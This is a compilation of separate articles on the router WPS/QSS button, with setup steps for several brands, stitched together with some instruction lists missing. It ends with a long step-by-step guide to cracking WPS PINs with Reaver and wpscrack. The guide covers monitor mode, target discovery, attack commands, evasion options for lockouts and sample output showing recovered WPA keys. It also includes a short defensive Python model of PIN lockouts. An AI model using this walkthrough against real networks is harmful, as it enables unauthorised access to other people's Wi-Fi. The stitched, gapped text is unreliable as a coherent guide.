WPS on a router: what is it? The WPS button on the router: what it is and how to configure QSS or EZSetup.

Surely many of you have paid attention to one strange, inconspicuous WPS button on the router. What is it anyway, what does it mean and what is it for? By the way, WPS is not the only abbreviation that denotes this function. For example, TP-Link calls it QSS, and older Asus calls it EZSetup.

Wireless WPS technology, or “Wi-Fi Protected Setup,” is a function that automatically configures the connection between the router and a device that connects to WiFi.

It is present on all modern models of WiFi routers. It can also be found on a wifi adapter or printer equipped with a wireless module. The WPS button, which is often combined with the Reset function, can be very useful when connecting various gadgets.

The essence of the technology is that the router generates an encrypted signal with information about the wireless network settings, which is received wirelessly by the connecting adapter.

QSS button on TP-LINK

Until recently, TP-LINK used its own name, “QSS” (Quick Security Setup), on its routers. So there is no point in looking for a WPS button on routers from this company that were released several years ago.

But new TP-Link models also use the common name “WPS”. And ASUS routers used to use yet another name, “EZSetup”.

What is the WPS-Reset button on the router for?

Actually, the WPS/Reset button on the router or any other device activates this function.

For example, you bought a USB adapter and want to connect a laptop or computer to your router. But you don’t know exactly how to properly configure it to connect to the network. Either you just don’t know how yet, or you simply don’t have a WiFi password, and access to the admin panel of the router is closed.


Then the WPS function will help us, provided that this technology is supported by the router and adapter. It's easy to find out about this. Both devices must have a corresponding WPS button on their body to activate this mode.

In exactly the same way, you can connect other wireless devices that support Wi-Fi Protected Setup to the router - TV, IP cameras, wifi amplifiers, storage devices, etc.

How to connect a WiFi adapter to a router via WPS-QSS?

The easiest way is when a WPS or QSS button is clearly physically present on both the router and the connected adapter.

Accordingly, to activate the Wi-Fi Protected Setup function, press this key on the router and on the wifi adapter at the same time for a few seconds, then wait until the indicator lights blink, showing that a connection has been established between them.

If the WPS button is combined with RESET, then a short press activates the connection mode, and a long press resets the settings! Do not hold it too long, otherwise the router will be reset to factory defaults.

However, if there is no such button, this does not mean that the technology is not supported. Less commonly, the following cases occur:



WPS button in Zyxel Keenetic

First, you need to find out whether WPS mode is enabled on the router (provided, of course, that you have access to the admin panel). This is what the setting looks like on a Zyxel Keenetic router (menu section “WiFi”).

In the new Keenetic admin panel, you can open the configuration we need right from the start screen.

And here click on “Start WPS”.

WPS-Reset button on the TP-LINK router (QSS Function)

On a TP-LINK router, the WPS button on many models is often combined with the Reset function. In this case, a short press activates WPS, and a long press resets the settings.

If it is not on the case, then we look for a way to enable this mode in the settings. This is what it looks like in the admin panel.

In earlier versions it was called QSS. But today the manufacturer has adopted the generally accepted terminology and calls it the same as everyone else.

WPS on Asus router - EzSetup program

The WPS function is also available on Asus routers. Here's the button:

And here is a screenshot of enabling WPS from the control panel. Please note that you can also set your own PIN if you wish.

If you have an older model, you will most likely see a program like EzSetup instead of WPS. This button launches this application for quick configuration.

WPS in Netis router

Same thing on Netis

By the way, on the Netis router, as we see, you can also connect any device via WPS with a password in the opposite direction, that is, when the password is set on the gadget itself and then entered in the router admin panel. Sometimes this is also necessary.

How does WPS work on D-Link?

And this is what the WPS configuration panel looks like on a D-Link router.

So, let's activate this mode and apply the changes.

After this, we find the WPS button on the router and on the second device and briefly press them at the same time: the signal exchange takes only a few seconds, so both devices must be in WPS mode simultaneously.

The WPS button is often combined with the Reset function, so press it and release immediately: holding it for a long time will cause a full reset and reboot.

WPS button on wifi adapter and repeater

Now I’ll give a few examples from other gadgets. This is what the WPS button on a wifi adapter might look like.

And here it is on the Edimax adapter.

In the next photo we see a similar key on the body of a signal amplifier.

How to connect to WiFi via WPS from a Windows 10 computer?

Let's now connect a laptop or computer running Windows 10 to the router using WPS technology. By the way, everything works exactly the same on Windows 7, the only difference will be in the visual display.

So, click on the WiFi icon in the Windows panel and find your network in the list.

We see that to connect you can either enter a password or use WPS. In this case, of course, the mode must be active on the router; I already wrote above about how to check this.

Now we briefly press the mechanical QSS (or WPS) button on the router, after which the laptop will connect to WiFi itself.

Finally, note that if WPS is left permanently enabled on a WiFi router, there is a risk of your network being compromised, for example through the WPS Connect mobile app. So once you have connected your gadget, turn WPS/QSS off in the router admin panel.

How to disable WPS on a router?

Accordingly, to disable WPS on the router, you must again go to its panel and deactivate this function. The setting is in the same place where it is turned on, which I showed above. On each model this section is named differently.

WPS on a router stands for “Wi-Fi Protected Setup”. The technology was created to simplify connecting various devices to the network. It is supported by almost all routers. Its main advantage is that you don’t have to enter a password on your phone or laptop to connect. This is especially useful when you have forgotten your Wi-Fi password and cannot look it up in the router settings. This article describes in detail how the technology works and gives instructions for using it.

How WPS mode works

Now that we have found out what WPS is, it is worth talking about how this technology works. To create a wireless network, the user normally needs to configure the router's access point and then connect their device to the local network by entering a security password.

WPS greatly simplifies this procedure. The router generates a random password automatically and then transmits it to the device that connects to the network via Wi-Fi Protected Setup. Thanks to this, you do not have to search for your network among others and enter the password manually.

The WPS protocol is supported by Windows operating systems and most mobile gadgets running Android OS. On those operating systems that do not have built-in utilities, you can download a special driver that expands the functionality of the system.

Using WPS (QSS) on a router

You can connect devices to the router using WPS either by hardware (a button) or by software. It all depends on the gadget you are connecting to the wireless network.

Hardware connection: what is it and how is it used

The first option involves only two actions: you need to press the buttons with the corresponding designation on the router and on the connected gadget. The WPS button on a router is usually located on the back panel of the device.

In some cases, the button is combined with the reset function (RESET). If you do not want to reset the router to factory settings, do not hold it for more than 5 seconds. The corresponding light indicator on the front panel of the router will notify you that the WPS function is activated.

Software connection of mobile phone/tablet

The Android operating system includes a connection function via WPS. To use it, follow the instructions below, namely:


If everything is done correctly, the smartphone will connect to your local network.

Connecting a Windows device

You can use Wi-Fi on your laptop after establishing a connection with the router via WPS. To do this, you need to follow several steps:

If you need to disable this protocol on routers, simply press the button (if it is not there, you can only disable WPS on the router through the settings).

What to do if there is no WPS button on the router: examples of activation

Many models do not provide hardware activation of the Wi-Fi Protected Setup protocol. This means that the connection is made through the web interface. To do this you need to do the following:


After completing these steps, you will be able to use Wi-Fi without any problems. The eight-digit PIN is often printed on a sticker attached to the modem case.

There is an alternative option for connecting mobile devices:


When you enter the correct combination, your mobile phone or tablet will be connected to the network. This function allows you to connect any devices that support this protocol to Wi-Fi.

How to disable WPS through settings

To deactivate, you need to click the “Disable” button in the corresponding section of the router or select the Disabled item.

Hello! Today I decided to talk about WPS (QSS) technology: what the QSS button on a Wi-Fi router is for and how to use it in practice. It seems to me that all modern routers now have WPS (QSS) technology, so the information is relevant. In my TL-WR841N router, and in TP-Link routers in general, this function is called QSS.

QSS, or WPS, is a technology that allows you to semi-automatically create a wireless Wi-Fi connection between your router and the device you want to connect to the network.

The abbreviations stand for:

WPS – Wi-Fi Protected Setup
QSS – Quick Security Setup

Now let me describe it in my own words. For example, guests come to you and want to connect to your Wi-Fi network. What do you usually do? Look for your Wi-Fi password, then enter it on the device, and only then does it connect. QSS technology simplifies this procedure.

You simply find your network on the device, select WPS in the additional settings and press “Push button” (that is what it is called on my phone), then tap connect, and press the QSS button on the router. The devices exchange a PIN code and connect to each other. As you can see, everything is convenient, you don’t need to enter anything. I checked it myself, everything works fine.

Now I will write in more detail:

  • How to enable (disable) QSS on a TP-Link router.
  • How to connect a device (phone) to a Wi-Fi router using QSS technology
  • What are the dangers of using WPS (QSS) technology?

How to enable/disable QSS on a TP-Link router?

When I wrote the setup article, I mentioned the QSS button; on this router it looks like this:

Right away, before I forget, I want to answer those who ask: if I press this QSS button, does that mean that everyone will be able to connect to my router? The answer is no. This button only works when you press it, and for a short time after pressing it; that is the moment when you connect your phone or tablet. The process of connecting and exchanging a PIN code takes just a few seconds.

The QSS function can be enabled or disabled in the router settings. Immediately after setting up the router, this technology was enabled for me, and it still works. In order to enable or disable the QSS protocol, or generate a new PIN code, as well as to add a new device from the router control panel, you need to go to the router settings.

I have already written several times how to do this, type the address 192.168.1.1 in the browser address bar, enter the login and password to access the settings (admin and admin by default) and confirm the login.

Then on the left go to the “QSS” tab, and the “QSS (Quick Secure Setup)” page will open. If QSS Status shows Enabled, the technology is enabled; to disable QSS, click the “Disable QSS” button. And accordingly, if it is disabled, then to enable it you need to press the “Enabled” button.

How to connect a device to a Wi-Fi router using QSS technology?

I will show you the process of connecting to a router using QSS technology, using the WR841N router and HTC One V phone as an example.

We turn on Wi-Fi on the phone and wait until our network appears in the list. We tap on it, and the phone immediately prompts us to enter a password. Instead we choose “Advanced options”, then “WPS” and then “Push button”. At this moment, hold down the QSS button on the router, and on the phone tap “Connect”. That’s all: the phone connects to the router, and you can release the button on the router.

What are the dangers of using WPS (QSS) technology?

There are vulnerabilities, friends, and there is a risk that your network will be hacked via QSS. In principle, it is impossible to protect your Wi-Fi network completely, but enabling QSS only increases the risk of it being hacked.

My advice is this: if you rarely connect new devices to your router, it is better to disable the QSS protocol, since you practically don’t need it. If you often connect new devices, then use QSS and don’t think about the bad things :). If you are comfortable with this technology, then you should not give it up. Good luck!


What are QSS and WPS? What is the QSS button for on a Wi-Fi router and how to use it? updated: March 3, 2014 by: admin

If the Wi-Fi router or access point has a WPS button, then the user does not have to set up the wireless network manually. By pressing the WPS button on the router for 3-5 seconds, and then the one on the Wi-Fi adapter of the subscriber device, we get a connection between the device and the router.

The network name cannot be changed, and the password value is generated randomly. We will also look at another method that lets the user set these values themselves, as they require.

WPS button on the router

But first, let’s list exactly what is required for the method discussed above. Firstly, the router must have a WPS button. The subscriber device must have a similar option (the “button” can be hardware or software).

Also, the “WPS” option in the router must be enabled. Devices of this class are usually configured from the web interface. We will look at an example (how to enable WPS in TP-Link routers).

And one last thing. On many wireless router models the WPS button is combined with the reset button. Hence the rule given below.

It is important to know: when pressing the WPS button on the router, hold it for no more than 5 seconds. Otherwise, we get a “hard reset” of the settings, and nothing more.

Different connection methods using WPS

PBC, or push button connect

Actually, this method has already been discussed.

The sequence of actions is as follows:

  1. Pressing the WPS button on the router (you need to hold it for 3-5 seconds, then release).
  2. Pressing the WPS button on the subscriber device (it is enough to hold the button for 2-3 seconds).
  3. After about a minute, the device will connect to the wireless network.

But here is the disadvantage of this method, which looks very simple at first glance. See what the resulting Wi-Fi password (“created” by the devices themselves) looks like:

Result of creating a connection using the PBC method

Note that between steps “1” and “2” no more than 1 minute should pass.

Connecting using the router PIN code

This method only works on Windows 7 or Vista with Service Pack 2.

When the router has fully booted (about a minute after turning it on), look for the Wi-Fi network with the appropriate name. Here is an example for Tenda routers:

Network search

Opposite the required network there will be a checkbox “Connect automatically” and a “Connect” button (click it).

Since Wi-Fi encryption is not configured in the router, the system will prompt you to create and set a password (and at the same time a new network name). Click the “OK” button and follow the instructions of the “wizard”:

Start setting up

First of all, you will need to provide the PIN code of the router (the value can be found on the sticker located on the bottom of the case). Then, come up with a name and password, and select the encryption method:

WPS Network Setup Wizard

By clicking “Close”, we get a wireless network available to all subscribers (the network remains with the name and password that were set). In our example: name – “Home_Network”, password – 1fx2-ufge-198g. As you can see, the WPS button on the router is not used in this case.

Happy setup!

Prerequisites for setting up a network via WPS

How the PC network card should be configured

Regardless of the connection method (that is, the algorithm for creating a new network using WPS), the network card in the subscriber device is configured as follows: the device receives its IP address “automatically”, as does the DNS server address.

Therefore, the network card is configured for “auto” IP and DNS. Most devices have this setting by default.

How the router should be configured

First of all, the wireless network must be turned on in the router or access point. To use the WPS option, in addition, you need to “allow” the router to use it:

WPS tab

TP-Link wireless routers have a separate tab called “WPS”. Check that the option has been enabled (you can disable it if necessary). By the way, you can set your own PIN code value (by clicking the “Create a new PIN code” button).

It is not necessary to change the PIN code; its value does not affect security. And when connecting using the PBC method, this code is not used at all (see the example in the video):

Not so long ago, it seemed that a wireless network protected with WPA2 was quite secure. A simple key can indeed be found. But if a really long key is set, neither rainbow tables nor even GPU acceleration will help recover it. Yet, as it turned out, you can connect to a wireless network without any of this, by taking advantage of a recently discovered vulnerability in the WPS protocol.

WARNING

All information is presented for educational purposes only. Penetrating into someone else's wireless network can easily be considered a criminal offense. Think with your head.

The price of simplifications

There are fewer and fewer open access points that need no key to connect at all. It seems that soon they will be listed in the Red Book. If previously a person might not even know that a wireless network can be locked with a key, protecting it from outside connections, now they are increasingly being told about this possibility. Take, for example, the custom firmware that leading providers release for popular router models to simplify setup. You need to specify two things: a login/password and... a key to protect the wireless network. More importantly, the hardware manufacturers themselves are trying to make the setup process straightforward. Thus, most modern routers support the WPS (Wi-Fi Protected Setup) mechanism. With its help, the user can set up a secure wireless network in a matter of seconds, without bothering at all about the fact that “you need to enable encryption somewhere else and register a WPA key.” Enter the eight-digit PIN printed on the router into the system, and you’re done!

And here, hold on tight. In December, two researchers reported serious fundamental flaws in the WPS protocol. It is like a back door into any router. It turned out that if WPS is activated on the access point (which, mind you, is enabled by default in most routers), then you can brute-force the PIN and extract the connection key in a matter of hours!

How does WPS work?

The idea of the creators of WPS is a good one. The mechanism sets the network name and encryption automatically. Thus, the user does not need to go into the web interface and deal with complex settings. And you can easily add any device (for example, a laptop) to an already configured network: if you enter the PIN correctly, it receives all the necessary settings. This is very convenient, which is why all the major players on the market (Cisco/Linksys, Netgear, D-Link, Belkin, Buffalo, ZyXEL) now offer wireless routers with WPS support. Let's look at it in a little more detail.

There are three options for using WPS:

  1. Push-Button-Connect (PBC). The user presses a special button on the router (hardware) and on the computer (software), thereby activating the setup process. We are not interested in this.
  2. Entering a PIN code in the web interface. The user accesses the administrative interface of the router through a browser and enters the eight-digit PIN code written on the device body (Figure 1), after which the setup process occurs. This method is more suitable for the initial configuration of the router, so we will not consider it either.
  3. Entering the PIN code on the user's computer (Figure 2). When connecting to a router, you can open a special WPS session, within which you can configure the router or obtain its existing settings if you enter the PIN code correctly. This is already attractive. No authentication is required to open such a session. Anyone can do this! It turns out that the PIN code is already potentially susceptible to a brute-force attack. But that is only the beginning.

Vulnerability

As I noted earlier, the PIN code consists of eight digits, so there are 10^8 (100,000,000) candidates to try. However, the number of candidates can be reduced significantly. The last digit of the PIN is a kind of checksum, calculated from the first seven digits. As a result, we already get 10^7 (10,000,000) candidates. But that's not all! Next, let us look carefully at the structure of the WPS authentication protocol (Figure 3). It feels as if it was specially designed to leave room for brute force. It turns out that PIN verification is carried out in two stages: the PIN is split into two equal halves, and each half is checked separately! Let's look at the diagram:

  1. If, after sending the M4 message, the attacker received an EAP-NACK in response, then he can be sure that the first part of the PIN code is incorrect.
  2. If he received an EAP-NACK after sending M6, then, accordingly, the second part of the PIN code is incorrect. We get 10^4 (10,000) options for the first half and 10^3 (1,000) for the second. As a result, we have only 11,000 options for a complete search. To better understand how this will work, look at the diagram.
  3. An important point is the possible search speed. It is limited by the speed at which the router processes WPS requests: some access points will produce results every second, others every ten seconds. Most of the time is spent on calculating the public key using the Diffie-Hellman algorithm; it must be generated before step M3. The time spent on this can be reduced by choosing a simple secret key on the client side, which will simplify the calculations of other keys in the future. Practice shows that for a successful result it is usually enough to go through only half of all options, and on average brute force takes only four to ten hours.

First implementation

The first brute-force implementation to appear was the wpscrack utility (goo.gl/9wABj), written in Python by researcher Stefan Viehböck. The utility uses the Scapy library, which allows arbitrary network packets to be injected. The script can only be run on Linux, after first switching the wireless interface to monitor mode. As parameters, you must specify the name of the network interface in the system, the MAC address of the wireless adapter, and the MAC address of the access point and its name (SSID).

$ ./wpscrack.py --iface mon0 --client 94:0c:6d:88:00:00 --bssid f4:ec:38:cf:00:00 --ssid testap -v
sniffer started
trying 00000000
attempt took 0.95 seconds
trying 00010009
<...>
trying 18660005
attempt took 1.08 seconds
trying 18670004# found 1st half of PIN
attempt took 1.09 seconds
trying 18670011
attempt took 1.08 seconds
<...>
trying 18674095# found 2st half of PIN
<...>
Network Key:
0000 72 65 61 6C 6C 79 5F 72 65 61 6C 6C 79 5F 6C 6F really_really_lo
0010 6E 67 5F 77 70 61 5F 70 61 73 73 70 68 72 61 73 ras
0020 65 5F 67 6F 6F 64 6F 6C 75 63 6B 5F 63 72 61 63 e_good_luck_crac
0030 6B 69 6E 67 5F 74 68 69 73 5F 6F 6E 65 king_this_one
<...>

As you can see, first the first half of the PIN was found, then the second, and in the end the program produced a ready-to-use key for connecting to the wireless network. It is hard to imagine how long it would have taken to recover a key of this length (61 characters) with the previously existing tools. However, wpscrack is not the only utility for exploiting the vulnerability, and here is a curious coincidence: at the same time, another researcher, Craig Heffner of Tactical Network Solutions, was working on the same problem. Seeing that a working PoC of the attack had appeared on the Internet, he published his Reaver utility. It not only automates the process of guessing the WPS PIN and extracting the PSK, but also offers many more settings so that the attack can be carried out against a wide variety of routers. In addition, it supports a much larger number of wireless adapters. We decided to take it as the basis and describe in detail how an attacker can use the vulnerability in the WPS protocol to connect to a secured wireless network.

HOW-TO

As with any other attack on a wireless network, we will need Linux. It must be said here that Reaver is present in the repository of the well-known BackTrack distribution, which also already includes the necessary drivers for wireless devices. So that is what we will use.

Step 0. Prepare the system

On the official website, BackTrack 5 R1 is available for download as a VMware virtual machine and as a bootable ISO image. I recommend the latter option. You can simply burn the image to a disc, or use a program to make a bootable USB flash drive: either way, after booting from such a medium, we immediately have a system ready for work without any unnecessary problems.

Crash Course on Wi-Fi Hacking

  1. WEP (Wired Equivalent Privacy). The very first technology for protecting a wireless network turned out to be extremely weak. It can be cracked in literally a few minutes, using the weaknesses of the RC4 cipher it relies on. The main tools here are the airodump-ng sniffer for collecting packets and the aircrack-ng utility, used directly to crack the key. There is also a special tool, wesside-ng, which cracks all nearby WEP points automatically.
  2. WPA/WPA2 (Wi-Fi Protected Access). Brute force is the only way to find the key for a closed WPA/WPA2 network (and even then only if there is a dump of the so-called WPA Handshake, which is transmitted when a client connects to an access point). Brute force can drag on for days, months and years. To increase the efficiency of the search, specialized dictionaries were used first, then rainbow tables were generated, and later utilities appeared that use NVIDIA CUDA and ATI Stream technologies to hardware-accelerate the process on the GPU. The tools used are aircrack-ng (dictionary brute force), cowpatty (rainbow tables) and pyrit (video card).

Step 1: Login

The default login and password are root:toor. Once in the console, you can safely start “X” (there are separate BackTrack builds, with GNOME and with KDE):

# startx

Step 2: Install Reaver

To download Reaver, we will need internet. Therefore, we connect the patch cord or configure the wireless adapter (menu “Applications > Internet > Wicd Network Manager”). Next, we launch the terminal emulator, where we download the latest version of the utility through the repository:

# apt-get update
# apt-get install reaver

Here I must say that the repository contains version 1.3, which personally did not work correctly for me. After searching for information about the problem, I found a post by the author, who recommends updating to the highest possible version by compiling sources taken from SVN. This is, in general, the most universal installation method (for any distribution).

$ svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps
$ cd ./reaver-wps/src/
$ ./configure
$ make
# make install

There will be no problems building under BackTrack; I checked it personally. In the Arch Linux distribution that I use, installation is even simpler, thanks to the presence of a corresponding PKGBUILD:

$ yaourt -S reaver-wps-svn

Step 3. Preparing for brute force

To use Reaver you need to do the following:

  • switch the wireless adapter to monitor mode;
  • find out the name of the wireless interface;
  • find out the MAC address of the access point (BSSID);
  • make sure that WPS is activated on the point.

First, let's check that the wireless interface is present in the system at all:

# iwconfig

If the output of this command contains an interface with a description (usually wlan0), the system has recognized the adapter (if you connected to a wireless network to download Reaver, it is better to disconnect first). Let's put the adapter into monitor mode:

# airmon-ng start wlan0

This command creates a virtual interface in monitor mode; its name is shown in the command output (usually mon0). Now we need to find the access point to attack and find out its BSSID. Let's use airodump-ng, the utility for listening to wireless traffic:

# airodump-ng mon0

A list of access points within range will appear on the screen. We are interested in points with WPA/WPA2 encryption and PSK key authentication.

It is better to choose one of the first in the list, since a good signal from the access point is desirable for carrying out the attack. If there are many access points and the list does not fit on the screen, you can use another well-known utility, kismet, whose interface is more suitable in this respect. Optionally, you can check right away whether the WPS mechanism is enabled on our access point. For this, Reaver comes bundled (but only if you take it from SVN) with the wash utility:

# ./wash -i mon0

The parameter is the name of the interface switched to monitor mode. You can also use the '-f' option and feed the utility a capture (.cap) file created, for example, by the same airodump-ng. For some unknown reason, the Reaver package in BackTrack did not include the wash utility. Let's hope this error is corrected by the time this article is published.

Step 4. Run brute force

Now you can proceed directly to the PIN search. To start Reaver in the simplest case you do not need much: just specify the name of the interface (which we previously switched to monitor mode) and the BSSID of the access point:

# reaver -i mon0 -b 00:21:29:74:67:50 -vv

The "-vv" switch enables enhanced program output so we can make sure everything works as expected.

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacon from 00:21:29:74:67:50
[+] Associated with 00:21:29:74:67:50 (ESSID: linksys)
[+] Trying pin 63979978

If the program keeps sending PINs to the access point, everything has started well, and all that remains is to wait. The process may take a long time. The shortest time in which I was able to brute force a PIN was about five hours. As soon as the PIN is found, the program will happily inform you about it:

[+] Trying pin 64637129
[+] Key cracked in 13654 seconds
[+] WPS PIN: "64637129"
[+] WPA PSK: "MyH0rseThink$YouStol3HisCarrot!"
[+] AP SSID: "linksys"

The most valuable thing here is, of course, the WPA-PSK key, which you can immediately use to connect. It is all so simple that it is hard to believe.

Is it possible to defend yourself?

For now, there is only one way to protect yourself from this attack: disable WPS in the router settings. However, as it turned out, this is not always possible. Since the vulnerability exists not at the implementation level but at the protocol level, you should not expect a quick patch from manufacturers that would solve all the problems. The most they can do now is to make brute forcing as slow as possible. For example, if WPS is blocked for one hour after five unsuccessful attempts to enter the PIN code, the search will take about 90 days. But another question is how quickly such a patch can be rolled out to millions of devices operating all over the world.
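As an added example (not from the article), here is a small Python model of the lockout mitigation just described: a hypothetical registrar-side counter that disables WPS for a set time after a number of failed PINs, plus a worst-case time calculation that reproduces the "about 90 days" figure. It assumes a one-second PIN exchange and the 11,000-attempt bound that follows from the split PIN verification; both values are assumptions, not taken from this section.

```python
# Added example, not vendor firmware: a model of a WPS PIN-lockout policy.
# The PIN is verified in two halves (4 digits, then 3 digits plus checksum),
# so an exhaustive search needs at most 10**4 + 10**3 = 11,000 attempts.
from dataclasses import dataclass

WPS_MAX_ATTEMPTS = 10**4 + 10**3  # 11,000: worst case for the split PIN


@dataclass(frozen=True)
class LockoutPolicy:
    max_failures: int             # failed PINs tolerated before locking
    lock_seconds: float           # how long WPS stays disabled afterwards
    attempt_seconds: float = 1.0  # assumed duration of one PIN exchange


class WpsLockout:
    """Hypothetical registrar-side failure counter with a timed lock."""

    def __init__(self, policy: LockoutPolicy):
        self.policy = policy
        self.failures = 0
        self.locked_until = 0.0

    def allows(self, now: float) -> bool:
        """True if the registrar will start a PIN exchange at time `now`."""
        return now >= self.locked_until

    def record(self, now: float, pin_ok: bool) -> None:
        """Update the counter when an exchange finishes at time `now`."""
        if pin_ok:
            self.failures = 0          # a valid PIN clears the counter
            return
        self.failures += 1
        if self.failures >= self.policy.max_failures:
            self.locked_until = now + self.policy.lock_seconds
            self.failures = 0          # the lock itself is the penalty


def simulate_exhaustive_search(policy: LockoutPolicy) -> float:
    """Seconds needed to try all 11,000 PINs, waiting out every lock."""
    reg, now, tried = WpsLockout(policy), 0.0, 0
    while tried < WPS_MAX_ATTEMPTS:
        if not reg.allows(now):
            now = reg.locked_until     # nothing to do but wait
            continue
        now += policy.attempt_seconds  # the exchange runs, then fails
        reg.record(now, pin_ok=False)
        tried += 1
    return now


def worst_case_days(policy: LockoutPolicy) -> float:
    """Closed form of the same figure, in days (for checking the model)."""
    locks = (WPS_MAX_ATTEMPTS - 1) // policy.max_failures
    secs = WPS_MAX_ATTEMPTS * policy.attempt_seconds + locks * policy.lock_seconds
    return secs / 86400


if __name__ == "__main__":
    for label, pol in (("no lockout", LockoutPolicy(5, 0)),
                       ("5 failures -> 1 h lock", LockoutPolicy(5, 3600))):
        print(f"{label}: {worst_case_days(pol):.1f} days worst case")
```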

Upgrading Reaver

In the HOWTO we showed the simplest and most versatile way to use the Reaver utility. However, WPS implementations vary from manufacturer to manufacturer, so in some cases additional configuration is required. Below are additional options that can increase the speed and efficiency of the PIN search.

  1. You can set the channel number and SSID of the access point: # reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
  2. The '--dh-small' option has a beneficial effect on the brute force speed; it sets a small value for the secret key, thereby easing the calculations on the access point side: # reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
  3. The default response timeout is five seconds. If necessary, you can change it: # reaver -i mon0 -b 00:01:02:03:04:05 -t 2
  4. The default delay between attempts is one second. It can also be configured: # reaver -i mon0 -b 00:01:02:03:04:05 -d 0
  5. Some access points may block WPS for a certain time, suspecting that they are being attacked. Reaver notices this situation and pauses the search for 315 seconds by default; the duration of this pause can be changed: # reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
  6. Some implementations of the WPS protocol terminate the connection if the PIN code is incorrect, although according to the specification they should return a special message. Reaver automatically recognizes this situation; this is what the '--nack' option is for: # reaver -i mon0 -b 00:01:02:03:04:05 --nack
  7. The '--eap-terminate' option is intended for those APs that require the WPS session to be terminated with an EAP FAIL message: # reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate
  8. Errors in the WPS session may mean that the AP is limiting the number of PIN attempts, or is simply overloaded with requests. Information about this will be displayed on the screen. In this case, Reaver pauses its activity, and the pause time can be set using the '--fail-wait' option: # reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360

FAQ

Question: What wireless adapter is needed for hacking?

Answer: Before experimenting, you need to make sure that the wireless adapter can operate in monitoring mode. The best way is to check the list of supported hardware on the Aircrack-ng project website. If the question arises about which wireless module to buy, then you can start with any adapter based on the RTL8187L chipset. USB dongles can easily be found on the Internet for $20.

Question: Why do I get "timeout" and "out of order" errors?

Answer: This usually happens due to low signal strength and poor communication with the access point. In addition, the access point may temporarily block the use of WPS.

Question: Why doesn't MAC address spoofing work for me?

Answer: You may be spoofing the MAC address of the virtual interface mon0, and that will not work. You must specify the name of the real interface, for example, wlan0.

Question: Why does Reaver work poorly when the signal is bad, although the same WEP hacking works fine?

Answer: WEP cracking typically works by retransmitting captured packets to obtain more of the initialization vectors (IVs) needed for a successful crack. In that case, it does not matter whether some packet was lost or damaged along the way. But to attack WPS, you must strictly follow the packet exchange protocol between the access point and Reaver to check each PIN code. If some packet is lost or arrives corrupted, the WPS session has to be re-established. This makes attacks on WPS much more dependent on signal strength. It is also important to remember that just because your wireless adapter sees an access point does not mean that the access point sees you. So even if you are the happy owner of a high-power adapter from ALFA Network and an antenna with a couple of tens of dBi of gain, don't expect to be able to crack every access point you detect.

Question: Reaver always sends the same PIN to the access point, what's the matter?

Answer: Check if WPS is activated on the router. This can be done using the wash utility: run it and check that your target is in the list.

Question: Why can't I associate with an access point?

Answer: This may be due to poor signal strength or because your adapter is unsuitable for such research.

Question: Why do I keep getting "rate limiting detected" errors?

Answer: This is because the access point has blocked WPS. Usually this is a temporary block (about five minutes), but in some cases a permanent ban can be imposed (unblocking only through the administrative panel). There is one unpleasant bug in Reaver version 1.3, due to which the removal of such locks is not detected. As a workaround, the developers suggest using the '--ignore-locks' option or downloading the latest version from SVN.

Question: Can I run two or more instances of Reaver simultaneously to speed up my attack?

Answer: Theoretically, it is possible, but if they attack the same access point, the search speed is unlikely to increase, since in this case it is limited by the weak hardware of the access point, which is already fully loaded even with one attacker.